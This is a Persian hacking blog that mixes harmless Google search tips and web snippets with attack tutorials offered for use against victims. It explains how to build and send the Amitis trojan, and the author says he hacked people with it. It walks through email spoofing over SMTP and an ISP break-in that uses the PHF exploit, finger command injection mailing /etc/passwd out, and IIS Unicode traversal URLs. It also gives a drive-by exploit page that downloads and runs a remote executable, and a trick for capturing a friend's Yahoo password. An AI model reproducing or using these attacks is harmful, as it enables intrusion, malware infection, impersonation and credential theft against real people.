Download:

گرافیکی

 امنیتی

 فارسی شده

 رایت سی دی

  Learn :

PhotoShop

Flash Mx

Html

Hack & Crack

  About Me :

 سایت من


 
 


:اینم موزیک های 83

 

  تنها

 

 صصصwww.hacker.20m.com

 

 

 

جاواهای توپ

 

 امروز اومدم برنامه های جاوا اسکریپ رو که برای سایت یا وبلاگ تون به درد می خوره به شما بدم

زمانی که فرد رایت کلیک کرد یک پیغام به طرف می ده

 

از زیر وبلاگ شما هر مطلبی که می خواهید بیننده ببیند به صورت زیر گذر می گذرد

 

سرچ گوگل برای گوشه کنار سایت یا وبلاگتون

 

در هنگام لود شدن صفحه مونیتور را میلرزونه

 

 یک ساعت عقربه ای به دنبال موس شما می افته

 

از رایت کلیک کردن در سایت و همین  کشیدن موس روی کلمات به منظور کپی برداری جلو گیری می کند

 

شما به کاربر یک مطالبی را گوشزد می کنید که در صورت قبول کردن کاربر به این شروط به داخل وبلاگ یا سایتتان می رود

 

اينم آموزش حرکن عکس به دنبال موس

 

برنامه ای برای نمایش دادن IPکاربر سایت  در زمان بازدید از سایت

 

برنامه ای برای فهمیدن تعداد کاربران آنلاین یک سایت

 

 

 

 

روش های جستجو در گوگل

 

آيا تا به حال در سايت Google به جستجو پرداخته ايد؟ احتمالاً از اين موتور كاوش براي پيدا كردن مطلب يا سايتي در اينترنت يك يا چند بار استفاده كرده ايد. سايت Google هر مطلبي را كه در اينترنت موجود باشد، جستجو و پيدا مي كند. اين سايت، پنجمين سايت جستجوگر در جهان است و هر روز براي بيش از ده ميليون كاربر، صدها ميليون مطلب گوناگون را در اين سايت جستجو مي كنند. با اين حال، عملكردهاي اين جستجوگر فراتر از آن چيزي است كه اكثر مردم مي دانند.

1- جستجو در سايت هاي يك كشور خاص
Google قابليت جستجو به 84 زبان مختلف دنيا را دارد. براي اينكه بتوانيد در سايت هاي يك كشور خاص (در محدوده اين 84 زبان) به جستجو بپردازيد، وارد Language Tools شويد و سپس در قسمت :Search Pages Located in، كشور مورد نظر خود را انتخاب كنيد. پس از آن جستجو فقط در سايت هاي كشور مورد نظر انجام مي شود.

2- استفاده از آرشيو Google
گاهي اوقات فرد كاربر لينكي را در Google باز مي كند، ولي اين لينك عمل نمي كند، زيرا اينترنت هر روز تغيير مي كند و آدرسهاي اينترنتي نيز از اين قاعده مستثني نيستند. ولي با استفاده از يك روش باز هم مي توانيد به سايت ها دسترسي پيدا كنيد. براي اين كار، پس جستجوي يك آدرسي خاص، در كنار مشخصات سايت مربوطه لينكي به نام Archive يا Cashed وجود دارد. با كليك بر روي آن، آن سايت را همان طور كه قبلاً بوده، خواهيد ديد.

3- جستجوي موضوعات تخصصي در Google
كمتر كسي مي داند كه Google چند محدوده مخصوص براي جستجوي موضوعي خاص دارد. مثلاً مي توان به اين لينكها اشاره كرد:
www.google.com/microsoft.html
www.google.com/mac
www.google.com/linux


4- پيدا كردن نوع مشخصي از فايل
دستورات مشخصي به محدود كردن عمل جستجو كمك مي كنند. يكي از اين دستورات :filetype است. اجراي اين دستور مثلاً filetype:pdf كمك مي كند تا اطلاعاتي كه با فرمت pdf بر روي سايت قرار گرفته اند، بازيـــــــابي شوند. Google علاوه بر فرمت PDF، فرمت هاي:


- Word-Document) DOC)
- Excel) XLS)
- Powerpoint) PPT)
- Rich Text Format) RTF)
و ديگر فرمت ها را نيز جستجو مي كند.
توجه: بين دستور “:filetype” و نوع فرمت فايل مربوطه(مثلا pdf) نبايد فاصله اي وجود داشته باشد.

5- جستجو در يك وب سايت مشخص
فرمان “:Site” عمل جستجو را محدود به يك يا چند واژه در سايتي مي كند كه پس از اين فرمان مي آيد. مثلاً اگر مي خواهيد تمام مطالبي را كه سايت X راجع به دوربين هاي ديجيتالي دارد، پيدا كنيد، طبق دستور زير عمل كنيد.
“site:X” digital cameras
توجه: بين دستور “:Site” و آدرس سايت مورد نظر نبايد فاصله اي وجود داشته باشد.

6- پيدا كردن عكس
فرض كنيد در جستجوي عكسي از يك كيك هستيد كه كارت دعوت خود را با آن تزئين كنيد. اگر شما فقط لغت كيك را بدهيد، انبوهي از دستورات پخت كيك را دريافت مي كنيد. بدون اينكه عكسي در كار باشد. براي اين كار، از گزينه هاي بالاي صفحه Google، Images را انتخاب كنيد و سپس واژه مورد نظر خود را تايپ كنيد. در نتيجه، فقط عكسهاي مورد نظر خود را خواهيد يافت. اما هنگام استفاده از اين عكسها در اينترنت به قوانين كپي رايت دقت كنيد.

7- هوشمندي سايت Google
وقتي كه به دنبال مطلبي در اين سايت هستيد، اين موتور كاوش به صورت اتوماتيك درباره مورد درخواست شما پيشنهادهايي مي دهد. به عنوان مثال، فراموش كرده ايد كه پايتخت Island دقيقاً چگونه نوشته مي شود. شما اسم آن را به گونه اي تايپ مي كنيد كه در محاوره گفته مي شود، مثلاً Rekjawik، سپس سايت Google اطلاعات درست آن را كه Reykjavik است، به شما پيشنهاد مي كند.

8- استفاده از Google به عنوان فرهنگ لغت
فرض كنيد كه شما مرتب به اصطلاح “Currency Converter” برخورد مي كنيد، اما نمي دانيد كه معني آن چيست، در اينجاست كه مي توانيد از مترجم سايت Google استفاده كنيد. براي اين كار ابتدا زباني را كه مي خواهيد اين عبارت به آن ترجمه شود از طريق گزينه Language Tools مشخص كنيد. مثلاً اگر مي خواهيد به آلماني ترجمه شود، بايد زبان سايت را آلماني كنيد. قسمت Search Sites in Germany را كليك كنيد و سپس دستور زير را در خط فرمان وارد كنيد:
“engl. currency converter”

9- استفاده از جستجوي پيشرفته
در حالتي كه جستجوي شما از حالات متعددي برخوردار است يا فرماني را فراموش كرده ايد، مي توانيد از منوي جستجوي پيشرفته (Advanced Search) استفاده كنيد.

 

 

 

 

ضایع کردن جوجه هکر ها

 

امروز اومدم یه روشی بهتون یاد بدم که این جوجه هکرهایی که با برنامه  Magic Ps  میان پسورد آی دی رو در میارن ضایع کنید.

روش کار خیلی ساده است:

شما همیشه سعی کنید با آی دی خود به یاهو مسنجر وصل نشین. (یعنی چی؟)

یعنی یک پروفایل بسازین و همیشه با اون پروفایل وارد یاهو مسنجر بشین (توضیح بیشتر)

یعنی اونجایی که می خواین وارد مسنجر بشین به جای دادن آدی تون ، پروفایلتونو وارد کنید و پسورد همون پسورده.

خب حالا چطور جوجه هکر ها ضایع می شن؟ 

بنده خدا وقتی جوجه نتونه وارد ایمیلت بشه و پسوردت رو عوض کنه ضایع می شه اما اگه آدی تو رو بدونه وارد ایمیلت می شه و تو ضایع می شی. 

 

 

 

 

 

تذکرات امنیتی  هکر تنها

 

      1.       سعی کنید همیشه یا حتی الامکان از خونه به اینترنت وصل بشین.

2.       همیشه یه آنتی ویروس قوی روی سیستمتون نصب باشه ( من Norton رو پیشنهاد میکنم. چرا؟

     چون اولا معتبره ثابیا آپدیت می شه به طوری که در صورت آپدیت شدن حتی تروجان  Magic ps 1.5  رو هم گیر میندازه)

3.       هر ماه یکبار پسورد ایمیل یا بلاگ یا سایتتونو عوض کنید.

4.       در صورت استفاده از کافی نت مواظب بغل دستی و پشت سریتون باشین.

5.       در هنگام Chat   کردن از کسی فایل نگیرید در مورد ایمیل هم همین طور ( بخصوص این فایل Magic ps 1.5   که توسط آنتی ویروس Mail Yahoo   شناخته نمی شه)

6.       در هنگام گشت و گذار در صفحات وب مواظب Active X ها و Java  ها باشید.

 

 

 

 

 

اينم يه تروجان ايرونی

 

سلام دوستان ، اين بار مي خوام يک تروجان بهتون معرفی کنم و شمارو با طرز کارش آشنا کنم ، اسم اين تروجان Amitis هست که جديدترين نسخش 1.1 هست و يک تروجان ايرانی حساب مي شه و اين تروجان قابليت کلاينت - سرور داره . اين تروجان در حال حاضر از این وبلاگ قابل دریافت هستش. وقتی سرور باز ميشه اکثر اوقات فايروال اين موضوع را نمی فهمه که سرور ميخواد به نت وصلش و اگه هم اخطار بده و قربانی جواب منفی بده ، بازم سرور خود بخود جزو برنامهای وصل شده به نت قرار می گيره . اين تروجان 80 تا دستور داره که ميشه از آنها استفاده کرد مثل باز کردن و بستن  CD Romقربانی و ... اين تروجان بوسيله ويژوال بيسيک 6 نوشده شده و در ويندوزهای x-Me-2000 وXP کار مي کنه و همچنين اين تروجان از طريق پورت 2000 به سيستم قربانی وصل مي شه و آن پورت را باز ميکنه . البته اين تروجان ضعفهايی هم داره که براتون در پايان مقاله توضيح ميدم.


:
Client " Amitis "


بوسيله کلاينت اين تروجان شما مي تونين به سيستم قربانی وصلشين ، اسم آن که در پوشه تروجان است
Amitis.exe هستش و وقتی که سرور توسط قربانی باز بشه و ايميل براتون بياد ، شما بوسيله مشخصاتی از جمله پورت 2000 و آيپی قربانی با اين کلاينت می تونين به سيستم اون وصلشين و کنترل کامل کامپيوتر قربانی را بدست بگيرين در کلاينت گزينه های زيادی هست که استفاده از آنها خيلی راحت و آسان و احتياج به توضيح بيشتری نداره ، از جمله کنترل کامل IE طرف و يا کنترل ياهو مسنجر طرف و همينطور قسمتهای extra fun که خودش منوها و فهرستهای زيادی داره ولی استفاده از اين فهرست ها بستگی به باز کردن Server.exe داره که شما برای قربانی فرستادين .


Server.exe


همونطور که می دانيد اکثر تروجان ها قابليت کلاينت سرور دارن ،اين تروجانم همينطور و شما بايد در ابتدا سروری با مشخصات خودتون بسازين و برای قربانی يا همان کسی که ميخواين هکش کنين بفرستين ، سرور اين تروجان
Undected هست که وقتی اجرا يا باز بشه در برنامهای وصل شده به نت فايروال قرار می گيره با اسم ياهو مسنجر و خيلی راحت فايروالو دور ميزن که اين شامل زون الارم 2.6 و نورتن فايروالم ميشه و بعد فايروالو از کار ميندازه سرور زمانی که اجرا ميشه 5 کپی از خودش می گيره و در ويندوز و بعضی از پوشه های اون ميشين و همينطور در Startup با يک اسم تصادفی که اسم عوض شدهً سرور توسط هکر ميشين و خود بخود به نت وصل ميشه و سرور کليدهای ctrl+alt+del از کار ميندازه تا قربانی نتونه از اين راه Restart کنه . ولی خب سرور اين تروجان برخلاف اکثر تروجانها تو رجيستری قرار نمی گيره و در Run -Run service نمی شينه ولی در Win.ini ميشين و همچنين سرور هنگام باز شدن به ايميل ذخيره شدش اطلاعات قربانی را می فرسته از جمله آيپی و پورت و ... که اين آِيپی و پورت بايد در قسمت بالای کلاينت وارد شه تا هکر بتونه به سيستم قربانی وصل شود که البته بايد اين اطلاعات به ايميلی ارسال شه که هکر اونو در هنگام تنظيم سرور داده که قاعدتاً يکی از ايميل های خودش هست حالا يا ايميل را هک کرده يا خودش ساخته .


همچنين سرور برخلاف اکثر تروجانها که در پوشه
Windows/System می شينن در اين پوشه قرار نمی گيره اما در پوشه خود ويندوز ميشين يعنی در اين جا :


drive :\ windows و حجمش هم 104 kb هست و با اسم Rename شده توسط هکر ، برای مثال اگراسم سرور با اسم LoveBaby.exe عوض شه هنگام باز شدن با همين اسم در ويندوز و Startup می شينه و برای پاک کردن آن بايد اول فايل سرور را در Startup پيدا کنين که برای اين کار برين تو Run و تايپ کنين msconfig و به Startup برين و آنجا دنبال اسمی مثل : load= Win.ini C:\windows\lovesexy.exe


بگردين و تيک کنار اونو بردارين و بعد از
Restart از پوشه ويندوز نيز فايل سرورو پاک کنيد و همينطور ارتباط سرورو به نت در فايروال قطع کنيد و اونو که به اسم ياهو مسنجر پاک کنيد .


Edit Server.exe


با اين فايل
Edit Server می تونين ايميل خودتون را بدين که در سرور ذخيره شه و سپس برای قربانی بفرستين ، اين تروجان با Smtp هات ميل هيچ مشکلی نداره و من خودم چند نفرو با Smtp هات ميل هک کردم ، کار با Edit Server اين تروجان خيلی راحت ولی خب بازم من براتون توضيح ميدم . شما وقتی Edit Server را باز کردين بايد ايميل بدين تا بتونين سرورا با ايميل خودتون ذخيره کنيد . در قسمت ايميل من بهتون پيشنهاد ميکنم که يک ايميل از هات ميل بدين ، چون Defaulte اين تروجان بر پايه هات ميل خب در قسمت Smtp هم تيک Auto Smtp بزارين باشه و Smtp را عوض نکنين مگراينکه بخواين ايميل ياهو بدين ولی هات ميل باشه بهتر و بعد هم Server.exe را انتخاب کنين تا اين مشخصات در سرور ذخيره شه .


 


دريافت فايل

 

 

 

 

 

با نام شخص ديگری ميل بفرستيد!

 

پورت 25براي ارسال E-mail به‌کار ميرود. اين پورت از پروتکل SMTP براي اين کار استفاده ميکند
ويژگي مهم اين پورت اين است که تنها
E-mail ارسال ميکند و به متن و... کاري ندارد و از همين طريق مي توان بهترين استفاده را از آن کرد که همان ارسال E-mail از طرف شخصي به شخص ديگر است آن شخص مي تواند هرکس باشد حتي يک سايت.

SMTP مخفف کلمه Simple Mail Transfer Protocol است که يک پروتکل است و برنامه اي را که پورت 25 را باز مي کند SMTP SERVER مي گوييم (SMTP SERVER انواع مختلفي دادرد)
ما براي برقراري ارتباط با پورت 25 ابتدا بايد يک
Server پيدا کنيم که در ان پورت 25 باز باشد (البته در اکثر Server ها اين پورت براي فرستادن E-mail باز است)

حال بايد ببينيم که چگونه ميتوانيم يک همچين سروري را پيدا کنيم.
ترجيهآ براي
E-mail زدن به قرباني ما از خود SMTP SERVER قرباني بايد استفاده کنيم
براي پيدا کردن
SMTP SERVER ميتوانييد در سايت google دنبالش برويد يا ... ولي ساده ترين را اين است :
وارد اين سايت ميشويد
http://www.mob.net/~ted/tools/mx.php3
سپس در اين سايت نام سايت مورد نظر را تايپ ميکنيد(نام سايتي را که قرباني از انجا فضا براي
mailbox خود گرفته است يا خود سايت قرباني) براي مثال yahoo.com بعد دکمه lookup واقع در سايت را زده و بعد smtp server هاي مورد نظر شما نقش ميبندد.
مانند کاري که من کردم و در قسمت مورد نظر وارد کردم
yahoo.com که نتايج به صورت زير بود:

 


Domain Server: ns.mob.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
.
 


معلوم است که
SMTP SERVER ها YAHOO.COM عبارتند از :
 


mx1.mail.yahoo.com
mx2.mail.yahoo.com
mx4.mail.yahoo.com
 


حالا مي توانيم عمل
FAKEMAIL =( زدن ايميل از شخصي به شخص ديگر) خود را شروع کنيم.
براي مثال ميخواهيم از طرف
ic_ip@hotmail.com به vahshat_com@yahoo.com ايميل بزنيم و Subject و متن ان بترتيب salam و site ro upload kardam باشه .
ما براي اينکار ابتدا بايد ببينيم که
smtp server قرباني چه چيز هستش . در اينجا yahoo.com و ما از راه هايي که در قسمت بالا به شما اموختم smtp server سايت ياهو را پيدا ميکنيم که ميشه : mx2.mail.yahoo.com بعد از طريق زير به پورت 25 telnet مي کنيم:
ابتدا وارد
command report ميشيم (در درس قبل چگونگي اين ارتباط را توضيح دادم) و عبارات زير را تايپ مي کنيم:
 



telnet mx2.mail.yahoo.com 25
 


بعد از تايپ دستور، صفحه پاک مي‌شود و جواب مي‌گيرم:

 

220YSmtp mta499.mail.yahoo.com ESMTP service ready
 


بعد عبارت زير را تايپ کنيد :(چون از
telnet استفاده ميکنيد حروفي که شما مي نويسيد ديده نمي شود و همين طور از دکمه BackSpace نمي توانيد استفاده کنيد)
 


HELO yahoo.com
 


اگر مي خواهيد به جاهاي ديگه ايميل بزنيد مي توانيد جلوي
HELO اسم سايت مورد نظر خود را تايپ کنيد که ايرادي ندارد چون اکثرا چک نمي شود
.بعد از اين مرحله جواب ميشنويم :
 

220mta499.mail.yahoo.com
 


حالا مي خواهيم مشخص کنيم که ايميل از طرف چه کسي است در اينجا ما مي خواهيم از طرف
ahmad@hotmail.com ايميل بزنيم پس تايپ مي کنيم:
 


<
MAIL FROM: < ahmad@HOTMAIL.COM
 


جواب مي گيريم:
 

250sender ok
 


حالا بايد مشخص کنيم که مي خواهيم براي چه شخصي ايميل بفرستيم ما در اينجا مي خواهيم براي
ahmad@YAHOO.COM ايميل بفرستيم.پس تايپ مي کنيم:
 


<
RCPT TO: < ahmad@yahoo.com

 


و جواب مي‌گيريم:

 

250recipient ok
 


حلا مي نويسيم:

 


DATA
 


جواب مي گيريم:
 

354go ahead

 


حال وقت تايپ کردن يک سري چيز‌هاي اساسي است. اول مي‌نويسيم:
 



From: ahmad hacker
 


ahmad hacker همان اسمي است که ما مي خواستم از طرف او ايميلي بفرستيم بعد ازاين مراحل SUBJECT خود را تايپ مي کنيم :
 


Subject: SALAM
 


و بعد دوتا !!!
Enter زده و متن نامه را مي‌نويسيم:

 



Site ro upload kardam.
 




دقت کنيد نقطه آخر را حتما بعد از پايان نامه بگذاريد زيرا بايد ما به پورت 25 حالي کنيم که متن نامه تمام شده است بعد از گذاشتن نقطه و زدن کليد
Enter جواب دريافت ميکنيم:

 

250ok dirdel

 


سپس مي نويسيم :
 



QUIT
 


و خارج مي شويم.
براي ابتدا پيشنهاد ميکنم ابتدا بر روي خود اين کار را انجام دهيد البته امروزه برنامه هایی اومده که دیگه نمی خواد اینهمه دردسر بکشیم.

 

 

 

 

 

هک ISP

 

خوب اين كار n راه داره اما اينو بدون كه سايتها انقدا هم درپيت نيستن كه بشه راحت ازشون اكانت پيچوند و عشق دنيا رو كرد !
من يه چندتا راه رو مي گم كه اگه سعي كني و دنبالشو بگيري حتما يادمي گيري ! ببين براي بدست آوردن يوزرنيم و اكانت هاي يك آي اس پي بايد به هاردسرور اون آي اس ژي متصل بشي !در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي  Passwordها و ID ها را كه به نام  Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل   Passwd را باز كنيد چنين نوشته هايي را مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Ahmad hacker:3A62i9qr:1012:10:Mashhad

در اينجا مثلا ahmad hacker نام IDو 3a62... كلمه ي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها  Shadowedگفته مي شود .

root:*1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
ahmad hacker:*:1012:10:mashhad BFH:/home/user/ahmad hacker:/usr/local/bin/tcsh

حالا از اول يكم راحت تر اين روش رو كه حمله از طريق dos هست رو ميگم
بعد از اتصال كامل بايد از آي اس پي تون يه whois بگیرید ! اگه سایت مورد نظرتون برای org , net , com است من www.samspade.org رو پیشنهاد می کنم ! و روششم اینطوری هست :

http://www.samspade.org/t/whois?a=ahmad hacker.com

كه بجاي ahmad hacker.com آدرس سایت مورد نظرتون رو بنویسید حالا یه صفحه باز میشه که کلی اطلاعات در مورد این سایت نوشته ما با اونا کارنداریم فقط باید دنبال کلمه Domain servers یا بعضی موقه ها اگه اون نبود دنبال DNS Servers می گردیم که یا بالای صفحه هست یا پایین !
حالا وارد قسمت Command Prompt بشيد كه همون داس خودمونه تایپ کنید !
FTP http://www.domain.com
كه Domainآدرس سرور ISP هستش که اون بالا توضیح دادم بعد از شما خواسته مي شه تا آيدي خودتونو وارد كنيد كلمه  Anonymousرا بزنيد وقتي درخواست كلمه عبور شد كليد Enterرا بزن .اگر وارد سيستم شدي موفق شده اي در غير اين صورت جمله ي login failedدريافت مي شه . خوب پس این دفعه Password رو آدرس یهEmail را وارد كن .اگر اين بار هم جواب نداد اين دفعه روش هاي زیر رو امتحان کن :

FTP ftp.domain.com

خلاصه تمام تلاش خودتو براي فهميدن روش دستيابي به سيستم بكن اگر توانستيد وارد سيستم بشي به راحتي مي تواني وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيري ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با  FTPبايد دستورات FTPرا بلد باشی براي اینکه دستورات رو ببینید ? رو تايپ كنيد . حالا به شاخه ي ETCبرو مي تواني فايل passwd را در آنجا پيدا كني .اين فايل را بگير .اگر تو اونجا نبود شاخه هاي ديگه رو امتحان کن . ولي به احتمال زياد همونجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت  PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كن .

http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd

اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام بده .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كن .

www.domain.com/cgi-bin/finger

اگر اين آدرس كار كنه كادري جلوت ظاهر مي شه كه ازت می خواد نام مورد نظر خود را وارد کنی آدرس زير را وارد كنيد .

ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd

كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد     domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .

bfh@internet.com ; /bin/mail amir6_6_6i@yahoo.com < etc/passwd

با وارد كردن اين دستور فايل Passwdبراي من به آدرس ahmadx4u@yahoo.com
پست مي شi !

خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش بشي .
حالا اگر يه فايل مثل نمونه ي اولي كه در بالا بود گير آوردي مي تواني كار خود را ادامه بدي حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jack هستش .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني    www.hackersclub.com/km/frontpageبه دست بياوري ! اين روشهاي بالايي ماله سيستم هاي يونيكس هست كه الان تقريبا هفتاد درصد از يونيكس استفاده مي كنند !

روش بعدي استفاده از اسكريپت ها هست كه صد در صد عملي هست اما يكم مشكل هست !
تو اين روش شما بايد روش exploit و نوشتن اسكريبتها رو بلد باشيو بدون هيچ تروجان بك دوري مي توني وارد هارد سرور بشي !
اين روش اينطوري هست كه بعد از بدست آوردن سرور بايد آي پي سرور رو هم بدست بياري براي بدست آوردن آي پي سرور از فرمان nslookup تو داس استفاده مي كنيم !
C:\>nslookup
كه بعد از تايژ اين فرمان يه چيزايي مياد و آخرين سطر يه علامت < هست كه شما بايد جلوي اون آدرس سرور رو بنويسيد مثلا :
server s1.ahmad hacker.com<
كه جواب ميشنويم
Default Server: s1.ahmad hacker.com
Address: 194.165.8.60
حالا بايد بانوشتن اسكريبت ها وارد هارد سرور بشيم !
من در مورد نوشتن اسكريپت ها چيزي نمي گم چون كه با يه كي دو خط نمي شه چيزي فهميد !
شما بعد از نوشتن اسكريپت مي تونيد به شكل زير ازش استفاده كني !
http://serverip/script
كه به جاي serverip آي پي سرور بدست اومده رو مي نويسيم و به جاي script هم اون اسكريژتي كه نوشتيم حالا خيلي راحت وارد هارد سرور مي شي ! من نا اميدت نمي كنم امتحان كن يه نرم افزار برات معرفي مي كنم كه اين اسكريپت هارو سرچ مي كنه ! اما كامل نيست و زياد نميشه بهش تكيه كرد از این http://www.astalavistalab.com/files/cgis4.zip آدرس دانلود کنید اسمشم CGI Scanner هست !
روش كارشم اينه كه آدرس آي پي سرور رو تو قسمت و Url مينويسي و از منوي rule set گزینه scan all رو تایپ می کنی ! البنه می تونی مستقیما آدرس سایت رو تو قسمت Url بنویسی اما درصد خطا خیلی زیاد می شه ! من یه چند تا اسکرپت رایج رو برات می گم ! البته برای هر سرور یه اسکریپت جواب میده :


HTTP://194.165.8.60/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
TTP://194.165.8.60/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
HTTP://194.165.8.60/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir


راه های دیگه ای هم هستن مثل تروجانهای بک دور و ... اما هم مشکل ترن هم اینکه به خاطر فایروال ها و ... دیر و خیلی سخت به نتیجه می شه رسید !

 

 

 

 

فرستادن و اجرای مخفی یک فایل اجرایی در کامپيوتر

 

با روشي كه توضيخ خواهم داد شما مي توانيد از طريق يك سايت فايلي را در كامپيوتر هدف خود دانلود و سپس اجرا كنيد! راه نفوذ اين روش از طريق سر ريز شدن اينترنت اكسپلورر 6 و مديا پلير هست.



1. يك فايل با پسوند HTML تشكيل دهيد و كد زير را در آن قرار دهيد:

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://YourHost.com/YourEvilFile.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2);
location.href = "mms://";

</textarea>
Wait a couple of seconds..

<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/ /);
for (i=0;i<lines.length;i++) {

line = lines[i];
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"'");
line = line.replace(/[]/g,"\");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line +'rn';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);


</script>


بجاي قسمت http://YourHost.com/YourEvilFile.exe آدرس فايلي را بنويسيد كه مي خواهيد در كامپيوتر هدف اجرا شود.

اگر هدف شما مديا پلير را در شاخه يا داريوي غير از C:Program FilesWindows Media Playerwmplayer.exe نصب كرده است اين قسمت را نيز تغيير دهيد.



2. يك فايل ديگر با نام error.jsp تشكيل دهيد و داخل آن هر كد html كه مي خواهيد قرار دهيد. چون هدف شما در هنگام دانلود و اجرا شدن فايل صفحه درون فايل error.jsp را مي بيند.


3. حالا فايل html و error.jsp را در يك شاخه روي يك فضا رايگاني كه از يك سرور مثل http://www.angelfire.com گرفته ايد آپ لود كنيد.


4. از فايل اجرايي مديا پلير خود wmplayer.exe يك كپي تهيه كنيد چون احتمال دارد خراب شود


5. وارد صفحه html كه ساخته بوديد از طريق اينترنت اكسپلورر شويد. مثلا http://www.angelfire.com/youaccoundname/index.html


6. فايل بدون هيچ اخطاري دانلود شده و بجاي فايل اجرايي مديا پلير ميشيند و سپس اجرا مي شود

 

 

 

 

تو روم حرف بزن بدون اينکه شناخته بشی

 

ممکنه شما در اتاق باشين و دارين باvoiceحرف ميزنيد يه دفعه يه چيزهايی ميگيد که بقيه را عصبانی ميکنه واونا شما را ignorميکنن يا bootميکنن يا اينکه از roomميندازن بيرون خوب شما ميتونيد با اين ترفند يه کاری کنيد که اسمتون اون گوشه سمت چپ نباشه ولی صداتون تو اتاق باشه اما من يه نرم افزار سراغ دارم ۱مگابايت حجم داره اما شما دوستان چون يه سايت آپلود خوب پيدا نکردين برای بنده منم نميتونم اينارو بزارم تو وب خوب شما بايد دستی اين کارها را بکنيد وقتی ياهو مسنجر بالا اومد idخودتونو بديد و همچنينPassخودتونو وبعد در قسمت loginنامRoomمورد نظرو بديد ووقتی در اتاق وارد شديد Talkخودتونو به کار بيندازيد و بعد Logoutبزنيد وسريع چند بار برویTalkخودتون کليک کرده تا فعال شود اگه نتونستسن خلهد بشين خوب در قسمت ServerآخرينIpرو برداريد

 

 

 

 

password آخرين نفری که به ياهو وصل شده رو بردارين

 

يه موقع دوستتون مياد خونتون با ياهو مسنجر شما کانکت ميشه بعد شما بريد تو رجيستری(در Runتايپ کنيد Regedit)بعد بريد اين تو

Hkey_Current_user\software\yahoo\pager

بعد برين اين قسمتو پيدا کنيدSave Passwordو مقدار اونو از صفر به يک تغيير بدين

 

 

 

 

 

 

من هیچ مسوولیتی در قبال این برنامه ها  ندارم صرفا جهت آگاهی میباشد

با تشکر

تنها

 
کليه حقوق اين وبلاگ متعلق به احمد هکـــر می باشد و برداشت مطالب با ذکر منبع آزاد است .